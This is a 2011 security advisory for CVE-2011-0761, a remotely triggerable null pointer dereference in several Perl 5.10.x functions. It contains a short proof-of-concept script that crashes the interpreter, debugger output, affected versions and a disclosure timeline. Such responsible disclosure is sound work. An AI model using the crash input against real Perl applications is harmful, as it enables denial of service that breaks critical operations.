--------------------------------------------------------------------------- * Perl : multiple functions null pointer dereference * * uppon parameters injection * --------------------------------------------------------------------------- --[ Vulnerability Summary: Date Published: 03/05/2011 Last Update: 03/05/2011 Advisory ID: TSSA-2011-03 CVE Name: CVE-2011-0761 Title: Perl : multiple functions null pointer dereference Remotely Exploitable: Yes Locally Exploitable: No Impact: Remote DoS Advisory URL: http://www.toucan-system.com/advisories/tssa-2011-03.txt --[ Introduction: Following 2 paragraphs taken from the vendors' documentation: Perl officially stands for Practical Extraction and Report Language, except when it doesn't. Perl is a language optimized for scanning arbitrary text files, extracting information from those text files, and printing reports based on that information. It's also a good language for many system management tasks. The language is intended to be practical (easy to use, efficient, complete) rather than beautiful (tiny, elegant, minimal). --[ Synopsis: When given a wrong number of arguments, a number of perl functions will attempt to read memory from an unmapped location, resulting in a deterministic crash. --[ Vulnerability overview: The perl functions vulnerable to this attack are: getpeername() readdir() closedir() getsockname() readdir() rewinddir() tell() telldir() When given a wrong number of arguments, those functions will attempt to perform a comparison between an unalocated memory zone and a given register, resulting in a segmentation fault: jonathan@blackbox:~/test$ cat poc1.pl #!/usr/bin/perl $a = getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792); jonathan@blackbox:~/test$ perl poc1.pl Segmentation fault (core dumped) jonathan@blackbox:~/test$ More precisely, the Perl_gv_IOadd() function is invoqued and attempts to perform a comparison: gdb $ r ./poc1.pl [Thread debugging using libthread_db enabled] Program received signal SIGSEGV, Segmentation fault. ---------------------------------------------------------------[regs] eax:08178008 ebx:00000000 ecx:080C53B0 edx:000000F4 eflags:00210282 esi:00000000 edi:0817D554 esp:BFFFF640 ebp:BFFFF658 eip:08082B42 cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t S z a p c [0073:08082B42]------------------------------------------------[code] --[ Instruction: => 0x8082b42 : cmp BYTE PTR [ebx+0x8],0x9 The register ebx being null, the application actually tries to read from the (unmapped) first page, resulting in a null pointer dereference, and eventually a crash. --[ Impact: Perl not being a compiled language, injection of wrong number of parameters is technically possible (in very much the same way as say, sql injections). It is in any case not possible to execute code directly using this vulnerability as null pointers dereferences in the first page are not exploitable under modern OSes. But, if a given third party perl web application was calling one of the above listed vulnerable functions in a way allowing parameter injections, while performing a critical operation requiring some degree of atomicity, it would be possible to interrupt the execution of this operation before it completes, hence breaking the business logic assumptions of the web applications designers. Wether this vulnerability actually allows to steal millions from widespread perl web applications has not been investigated and won't be dulled about. --[ Vulnerable versions: Vulnerable : Perl version 5.10.x. In particular, versions 5.10.1 of perl as shipped with ubuntu 10.04 and 10.10 as well as version 5.10.0 provided with OSX 10.6 are known to be vulnerable. Non vulnerable : Perl version <= 5.10.0 OR >= 5.12.0. --[ Disclosure timeline: * 05/01/2011: Toucan System contacts the CERT, providing full description and PoC samples to audit the issue. * 10/02/2011: The CERT is able to replicate the bug under both ubuntu 10.04 and ubuntu 10.10, and therefor forwards the PoCs to the perl team. * 11/02/2011: The Perl Team acknowledge the vulnerability and starts investigating which exact versions are vulnerable. * 11/02/2011: The CERT assigns CVE-2011-0761 to this vulnerability. * 15/02/2011: The Perl Team notifies us that stable version 5.12.0 is not vulnerable to this bug. * 18/04/2011: Public disclosure. --[ Credits: Those vulnerabilities were discovered by Jonathan Brossard from Toucan System. --[ About Toucan System: Toucan System is a French computer security company providing cutting edge research and security consulting to Fortune 500 as well as smaller companies globally, thanks to a wide range of expertise ranging from Reverse Engineering and binary analysis to cryptography and Risk Management.